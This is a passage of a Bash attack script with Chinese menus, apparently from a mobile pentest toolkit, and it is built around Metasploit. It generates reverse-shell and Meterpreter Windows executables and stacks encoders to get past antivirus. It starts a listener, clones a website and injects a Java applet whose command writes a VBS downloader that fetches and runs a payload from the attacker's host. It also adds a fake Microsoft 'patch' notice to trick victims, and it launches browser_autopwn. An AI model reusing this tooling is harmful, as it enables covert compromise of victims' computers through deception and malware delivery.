echo "[4] windows/vncinject/reverse_tcp (Stg) "
echo "[5] windows/x64/shell/reverse_tcp (Stg) "
echo "[6] windows/x64/shell_reverse_tcp"
echo "[7] windows/x64/meterpreter/reverse_tcp (Stg) "
echo "[8] windows/x64/vncinject/reverse_tcp (Stg) "
echo -n -e "\e[1;37m"
echo "【*】 选择以上有效载荷 "
read -p $tubiao yourch
case $yourch in
1) export payload="windows/shell/reverse_tcp"
break ;;
2) export payload="windows/shell_reverse_tcp"
break ;;
3) export payload="windows/meterpreter/reverse_tcp"
break ;;
4) export payload="windows/vncinject/reverse_tcp"
break ;;
5) export payload="windows/x64/shell/reverse_tcp"
break;;
6) export payload="windows/x64/shell_reverse_tcp"
break ;;
7) export payload="windows/x64/meterpreter/reverse_tcp"
break ;;
8) export payload="windows/x64/vncinject/reverse_tcp"
break ;;
*) echo -e "\e[1;31m只能输入以上数字 [1-8]";
echo "回车继续..." ; read ;;
esac
done
while :;do
echo -e "\e[1;34m"
echo "[1] x86/avoid_utf8_tolower (Normal) "
echo "[2] x86/call4_dword_xor (Normal) "
echo "[3] x86/countdown (Normal) "
echo "[4] x86/fnstenv_mov (Normal) "
echo "[5] x86/jmp_call_additive (Great) "
echo "[6] x86/shikata_ga_nai (Excellent) "
echo "[7] x86/unicode_mixed (Normal) "
echo "[8] x86/unicode_upper (Normal) "
echo " --------------------------------- "
echo "[9] Yellow Multi encoder (Light) "
echo "[10] Red Multi encoder (Med) "
echo "[11] Blue Multi encoder (Med) "
echo "[12] Purple Multi encoder (High) "
echo "[13] Black encoder (High) "
echo " --------以上为混合编码------------ "
echo -e "\e[1;37m"
echo "【*】选择编码,用于过杀毒软件查杀"
read -p $tubiao yourch
cd $msfpath
case $yourch in
1) export enc=x86/avoid_utf8_tolower
encnum
function cmd { ./msfpayload $payload 'LHOST'=$localhost_ip 'LPORT'=$port R | ./msfencode -t exe -k $bin -e $enc -c $num > /var/www/file.exe
}
break ;;
2) export enc=x86/call4_dword_xor
encnum
function cmd { ./msfpayload $payload 'LHOST'=$localhost_ip 'LPORT'=$port R | ./msfencode -t exe -k $bin -e $enc -c $num > /var/www/file.exe
}
break ;;
3) export enc=x86/countdown
encnum
function cmd { ./msfpayload $payload 'LHOST'=$localhost_ip 'LPORT'=$port R | ./msfencode -t exe -k $bin -e $enc -c $num > /var/www/file.exe
}
break ;;
4) export enc=x86/fnstenv_mov
encnum
function cmd { ./msfpayload $payload 'LHOST'=$localhost_ip 'LPORT'=$port R | ./msfencode -t exe -k $bin -e $enc -c $num > /var/www/file.exe
}
break ;;
5) export enc=x86/jmp_call_additive
encnum
function cmd { ./msfpayload $payload 'LHOST'=$localhost_ip 'LPORT'=$port R | ./msfencode -t exe -k $bin -e $enc -c $num > /var/www/file.exe
}
break ;;
6) export enc=x86/shikata_ga_nai
encnum
function cmd { ./msfpayload $payload 'LHOST'=$localhost_ip 'LPORT'=$port R | ./msfencode -t exe -k $bin -e $enc -c $num > /var/www/file.exe
}
break ;;
7) export enc=x86/unicode_mixed
encnum
function cmd { ./msfpayload $payload 'LHOST'=$localhost_ip 'LPORT'=$port R | ./msfencode -t exe -k $bin -e $enc -c $num > /var/www/file.exe
}
break ;;
8) export enc=x86/unicode_upper
encnum
function cmd { ./msfpayload $payload 'LHOST'=$localhost_ip 'LPORT'=$port R | ./msfencode -t exe -k $bin -e $enc -c $num > /var/www/file.exe
}
break ;;
9)
function cmd { ./msfpayload $payload 'LHOST'=$localhost_ip 'LPORT'=$port R | ./msfencode -t raw -e x86/shikata_ga_nai -c 3 | ./msfencode -t exe $bin -e x86/countdown -c 3 > /var/www/file.exe
}
break ;;
10)
function cmd { ./msfpayload $payload 'LHOST'=$localhost_ip 'LPORT'=$port R | ./msfencode -t raw -e x86/avoid_utf8_tolower -c 2 | ./msfencode -t exe $bin -e x86/shikata_ga_nai -c 3 > /var/www/file.exe
}
break ;;
11)
function cmd { ./msfpayload $payload 'LHOST'=$localhost_ip 'LPORT'=$port R | ./msfencode -t raw -e x86/jmp_call_additive -c 3 | ./msfencode -t exe $bin -e x86/countdown -c 3 > /var/www/file.exe
}
break ;;
12)
function cmd { ./msfpayload $payload 'LHOST'=$localhost_ip 'LPORT'=$port R | ./msfencode -t raw -e x86/call4_dword_xor -c 2 | ./msfencode -t raw -e x86/shikata_ga_nai -c 2 | ./msfencode -t exe $bin -e x86/countdown -c 3 > /var/www/file.exe
}
break ;;
13)
function cmd { ./msfpayload $payload 'LHOST'=$localhost_ip 'LPORT'=$port R | ./msfencode -t raw -e x86/avoid_utf8_tolower -c 2 | ./msfencode -t raw -e x86/shikata_ga_nai -c 3 | ./msfencode -t exe $bin -e x86/countdown -c 3 > /var/www/file.exe
}
break ;;
*) echo -e "\e[1;31m只能输入以上数字 [1-13]";
echo "回车继续. . ." ; read ;;
esac
done
}
function msf_start(){
echo -e "\e[1;31m[!] \e[1;33m正在启动Metasploit!!! 这将需要一段时间...";sleep 4;cd /var/mobile/pentest/inter/msfmod/;./sl;echo "";echo ""
cd $msfpath
echo "use multi/handler" >> /tmp/msf.rc
echo "set LHOST $localhost_ip" >> /tmp/msf.rc
echo "set LPORT $port" >> /tmp/msf.rc
echo "set PAYLOAD $payload" >> /tmp/msf.rc
echo "exploit" >> /tmp/msf.rc
./msfconsole -r /tmp/msf.rc
}
if [ -f "/tmp/msf.rc" ];then rm /tmp/msf.rc;fi
if [ -f "/var/mobile/pentest/inter/msf.rc" ];then rm /var/mobile/pentest/inter/msf.rc;fi
if [ -f "/var/mobile/pentest/inter/*.html" ];then rm /var/mobile/pentest/inter/*.html;fi
if [ -d "/var/www" ];then rm -rf /var/www ;fi
mkdir /var/www
echo -e "\e[1;34m"
echo "[1] Windows 反弹后门 "
echo "[2] Java Applet 攻击"
echo "[3] Browser Autopwn 攻击"
echo -e "\e[1;37m"
echo "【*】选择以上列表序列号"
read -p $tubiao msf_key
case $msf_key in
#这里调用以上函数
1) echo "";payload;echo " ";echo -e "\e[1;33m正在制作有效载荷..... 请稍等"
cmd;wait;chmod a+x /var/www/file.exe;echo "完成后门程序制作";msf_start ;;
2) echo -e "\e[1;33m签署
该程序,需要克隆一个网页,注入一个安全的Java Applet,如果受害者访问克隆的网页,将会弹出提示,一旦受害者点击“运行”,主机将被感染。支持MAC OSX/Linux.\e[1;37m "
echo "<applet width='1' height='1' code='MSFcmd.class' archive='SignedMSFcmd.jar'>" > /var/www/index.html
echo "输入需要克隆的网址"
read -p ":" fakesite
if [ ! -z "$fakesite" ]; then export fakesite="$fakesite";elif [ -z "$fakesite" ];then echo "输入错误" ;sleep .5;continue;
echo -e "\e[1;33m[>] 正在克隆 $fakesite"
wget -ckq $fakesite
cat index.html >> /var/www/index.html
rm index.html
sleep .5
fi
echo -e "\e[1;33m[>] 注入Iframes标签..."
sleep .5
echo -e "\e[1;33m[>]完成!"
cp /var/mobile/pentest/inter/msfmod/java/MSFcmd.class /var/www
cp /var/mobile/pentest/inter/msfmod/java/SignedMSFcmd.jar /var/www
echo "<param name='first' value='cmd.exe /c echo Const adTypeBinary = 1 > \
C:\windows\apsou.vbs & echo Const adSaveCreateOverWrite = 2 >> C:\windows\apsou.vbs \
& echo Dim BinaryStream >> C:\windows\apsou.vbs & echo Set BinaryStream = CreateObject("ADODB.Stream") >> \
C:\windows\apsou.vbs & echo BinaryStream.Type = adTypeBinary >> C:\windows\apsou.vbs & \
echo BinaryStream.Open >> C:\windows\apsou.vbs & echo BinaryStream.Write BinaryGetURL(Wscript.Arguments(0)) >> \
C:\windows\apsou.vbs & echo BinaryStream.SaveToFile Wscript.Arguments(1), adSaveCreateOverWrite >> \
C:\windows\apsou.vbs & echo Function BinaryGetURL(URL) >> C:\windows\apsou.vbs & echo Dim Http >> \
C:\windows\apsou.vbs & echo Set Http = CreateObject("WinHttp.WinHttpRequest.5.1") >> C:\windows\apsou.vbs & \
echo Http.Open "GET", URL, False >> C:\windows\apsou.vbs & echo Http.Send >> C: windows\apsou.vbs & \
echo BinaryGetURL = Http.ResponseBody >> C:\windows\apsou.vbs & echo End Function >> C:\windows\apsou.vbs & \
echo Set shell = CreateObject("WScript.Shell") >> C:\windows\apsou.vbs & echo shell.Run "C:\windows\my.exe" >> \
C:\windows\apsou.vbs & start C:\windows\apsou.vbs http://$localhost_ip/my.exe C:\windows\my.exe'> </applet>" >> \
/var/www/index.html
echo "" >> /var/www/index.html
echo "网站安全检测..." >> /var/www/index.html
echo "你的浏览器存在漏洞,你需要接受并运行该修复补丁,这只需要一分钟的时间.
给您带来不便,我们非常抱歉!,——微软中国 " >> /var/www/index.html;sleep .5
echo -e "\e[1;33m正在制作有效载荷..... 请稍等";payload;cmd
cp /var/www/file.exe /var/www/my.exe
rm /var/www/file.exe
chmod a+x /var/www/my.exe
echo ""$localhost_ip" "$fakesite"" > /tmp/ipwnhost
msf_start ;;
#======================================================分割线=======================================#
3) echo -e "\e[1;33m使用browser_autopwn攻击存在的浏览器漏洞,使用\n本设备的IP地址作为一个恶意的Web服务器,\n需要手动在msf部署后使用dns欺骗到本机"
echo "这需要一个很长的时间.."
#echo -e "\e[1;31m[!]\e[1;33m Lighttpd已经死亡!"
killall lighttpd >/dev/null 2>&1 &
cd $msfpath
echo "use server/browser_autopwn" >> /tmp/msf.rc
echo "set LHOST $localhost_ip" >> /tmp/msf.rc
echo "set SRVPORT 80" >> /tmp/msf.rc
echo 'set URIPATH ""' >> /tmp/msf.rc
echo "run" >> /tmp/msf.rc
sleep .4
./msfconsole -r /tmp/msf.rc
;;
esac
}
pwninter